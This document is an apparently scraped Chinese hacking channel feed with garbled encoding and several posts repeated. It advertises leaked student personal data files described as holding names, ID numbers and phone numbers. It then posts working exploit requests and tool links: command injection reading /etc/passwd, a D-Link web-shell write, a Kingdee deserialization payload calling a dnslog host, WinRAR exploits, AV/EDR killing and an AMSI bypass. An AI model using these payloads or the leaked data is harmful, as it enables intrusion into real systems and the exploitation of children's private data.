ๅนฟไธๅญฆ็ๆฐๆฎ 10Wๆก.xlsx
18.3 MB
ๅนฟไธๅญฆ็ๆฐๆฎ 10Wๆก
้ซไธญๅญฆ็.xlsx
12.1 MB
้ซไธญๅญฆ็ๆฐๆฎ 14W+
ๅงๅ+ๆงๅซ+่บซไปฝ่ฏ+็ๆฅ+็ต่ฏ+ๅญฆๆ ก+็ญ็บง็ญ
ๅงๅ+ๆงๅซ+่บซไปฝ่ฏ+็ๆฅ+็ต่ฏ+ๅญฆๆ ก+็ญ็บง็ญ
ๅญฆ็ๆฐๆฎ ๅนผ-ๅฐ-ๅ-้ซ-ไธ-ๅคง 37W+ๆก.zip
91.5 MB
ๅญฆ็ๆฐๆฎ ๅนผ-ๅฐ-ๅ-้ซ-ไธ-ๅคง 37W+ๆก
ๅฝๅ
ๅญฆ็ๆฐๆฎ.xls
1.9 MB
ๅฝๅ
ๅญฆ็ๆฐๆฎ 1.3W+ๆก
ๅ ๅฎน๏ผๅงๅ-็ต่ฏ-่บซไปฝ่ฏ-้ฎ็ฎฑ-ๅญฆๆ ก
ๅ ๅฎน๏ผๅงๅ-็ต่ฏ-่บซไปฝ่ฏ-้ฎ็ฎฑ-ๅญฆๆ ก
๐18โค15๐ฅฐ11
ๅฉ็จ BYOVD ๆปๅป kill AV/EDR
Sharpblackout ๆฏ@Blackout้กน็ฎ็ๆน็ผ็ๆฌ๏ผๆๅ็ฑ@ZeroMemoryEx็จ C++ ๅผๅ๏ผๅ ถไธญๅ ๆฌไฝฟ็จ gmer (BYOVD) ้ฉฑๅจ็จๅบๅ ้ค AV/EDRใ
https://github.com/dmcxblue/SharpBlackout
Sharpblackout ๆฏ@Blackout้กน็ฎ็ๆน็ผ็ๆฌ๏ผๆๅ็ฑ@ZeroMemoryEx็จ C++ ๅผๅ๏ผๅ ถไธญๅ ๆฌไฝฟ็จ gmer (BYOVD) ้ฉฑๅจ็จๅบๅ ้ค AV/EDRใ
https://github.com/dmcxblue/SharpBlackout
GitHub
GitHub - ZeroMemoryEx/Blackout: kill anti-malware protected processes ( BYOVD )
kill anti-malware protected processes ( BYOVD ) . Contribute to ZeroMemoryEx/Blackout development by creating an account on GitHub.
๐5
SolarView ๅคช้ณ่ฝๅ็ตๅบ/ ๅคช้ณ่ฝๅ็ต็ๆง็ณป็ปๅฝไปคๆง่ก
fofa.info
body="SolarView Compact" && title=="Top"
ๅฝไปค cat${IFS}/etc/passwd
POST /conf_mail.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M
ๅฝฑๅjp
GET /downloader.php?file=%3Bid%00.zip HTTP/1.1
fofa.info
body="SolarView Compact" && title=="Top"
ๅฝไปค cat${IFS}/etc/passwd
POST /conf_mail.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M
ๅฝฑๅjp
GET /downloader.php?file=%3Bid%00.zip HTTP/1.1
โค4๐4
้่ฟๅฝๅ็ฎก้ๅ SMB ๅ่ฎฎ่ฟ่กไบคไบๅผ่ฟ็จ shell ่ฎฟ้ฎ
https://github.com/DarkCoderSc/SharpShellPipe
https://github.com/DarkCoderSc/SharpShellPipe
โค2
Winrar ๆผๆด exp
https://github.com/b1tg/CVE-2023-38831-winrar-exploit
https://github.com/b1tg/CVE-2023-38831-winrar-exploit
GitHub
GitHub - b1tg/CVE-2023-38831-winrar-exploit: CVE-2023-38831 winrar exploit generator
CVE-2023-38831 winrar exploit generator. Contribute to b1tg/CVE-2023-38831-winrar-exploit development by creating an account on GitHub.
โค2๐1
๐6โค3๐1
๐ฐ้ป็-๐ฉ๐๐๐๐ ๐ฉ๐ถ๐ฟ-่ตๆบๅ
ฌๅผ๐
ฅ๏ผๆฐๆฎ็ๆไปถ๏ผ
ๆ้ไบxssๆกไพ0822-7.pdf
ๅฏ็ :santiankejian.cves.io0822
โค6๐5
D-LINK-DAR-8000-10 ่ฟ็จๅฝไปคๆง่ก poc
https://xxx.xxx.xxx/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNDA2NTc2NjE2YzI4MjQ1ZjUyNDU1MTU1NDU1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiMjAzZjNlIGludG8gb3V0ZmlsZSAnL3Vzci9oZGRvY3MvbnNnL2FwcC9tb2R1bGUuY2xhc3MucGhwJw==
3.็ดๆฅ่ฎฟ้ฎshell
https://xxx.xxx.xxx/app/module.class.php?cmd=phpinfo();
https://xxx.xxx.xxx/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNDA2NTc2NjE2YzI4MjQ1ZjUyNDU1MTU1NDU1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiMjAzZjNlIGludG8gb3V0ZmlsZSAnL3Vzci9oZGRvY3MvbnNnL2FwcC9tb2R1bGUuY2xhc3MucGhwJw==
3.็ดๆฅ่ฎฟ้ฎshell
https://xxx.xxx.xxx/app/module.class.php?cmd=phpinfo();
โค2
ๅธ่ฝฏๆฅ่กจ็ณป็ป่ทๅ็ฎก็ๅๆ้
/ReportServer?op=fr_auth&cmd=ah_loginui&_=1619832545582
/ReportServer?op=fr_auth&cmd=ah_loginui&_=1619832545582
้่ถไบRCEๆผๆด poc
ๅฝฑๅๅนณๅฐ
6.x --> 6.2.1012.4
7.x --> 7.0.352.16ใ7.7.0.202111
8.x --> 8.0.0.202205ใ8.1.0.20221110
็ๆๅๅบๅๅpayload๏ผ
ysoserial.exe -f BinaryFormatter -g ResourceSet -o base64 -c "ping 8d51yv.dnslog.cn"
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: 192.168.0.110
User-Agent: Go-http-client/1.1
Content-Length: 2687
Content-Type: text/json
Accept-Encoding: gzip
{"ap0":"payload ๆฐๅผ","format":"3"}
ๅฝฑๅๅนณๅฐ
6.x --> 6.2.1012.4
7.x --> 7.0.352.16ใ7.7.0.202111
8.x --> 8.0.0.202205ใ8.1.0.20221110
็ๆๅๅบๅๅpayload๏ผ
ysoserial.exe -f BinaryFormatter -g ResourceSet -o base64 -c "ping 8d51yv.dnslog.cn"
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: 192.168.0.110
User-Agent: Go-http-client/1.1
Content-Length: 2687
Content-Type: text/json
Accept-Encoding: gzip
{"ap0":"payload ๆฐๅผ","format":"3"}
๐5โค1
winrar ไปฃ็ ๆง่ก๏ผ้ๅธธ็ฎๅ็ไธ้ฎๅฉ็จๅทฅๅ
ท
https://github.com/ignis-sec/CVE-2023-38831-RaRCE
https://github.com/ignis-sec/CVE-2023-38831-RaRCE
GitHub
GitHub - ignis-sec/CVE-2023-38831-RaRCE: An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831โฆ
An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831, WinRAR RCE before versions 6.23 - ignis-sec/CVE-2023-38831-RaRCE
๐4โค1
amsi ๆๆฐ็ป่ฟๆนๆณ
Windows ่ฟ็จ่ฐ่ฏๅจๆบๅถ็ป่ฟ AMSI ็ๅฆไธ็งๆนๆณ
https://github.com/MzHmO/DebugAmsi
Windows ่ฟ็จ่ฐ่ฏๅจๆบๅถ็ป่ฟ AMSI ็ๅฆไธ็งๆนๆณ
https://github.com/MzHmO/DebugAmsi
GitHub
GitHub - MzHmO/DebugAmsi: DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.
DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism. - MzHmO/DebugAmsi
โค1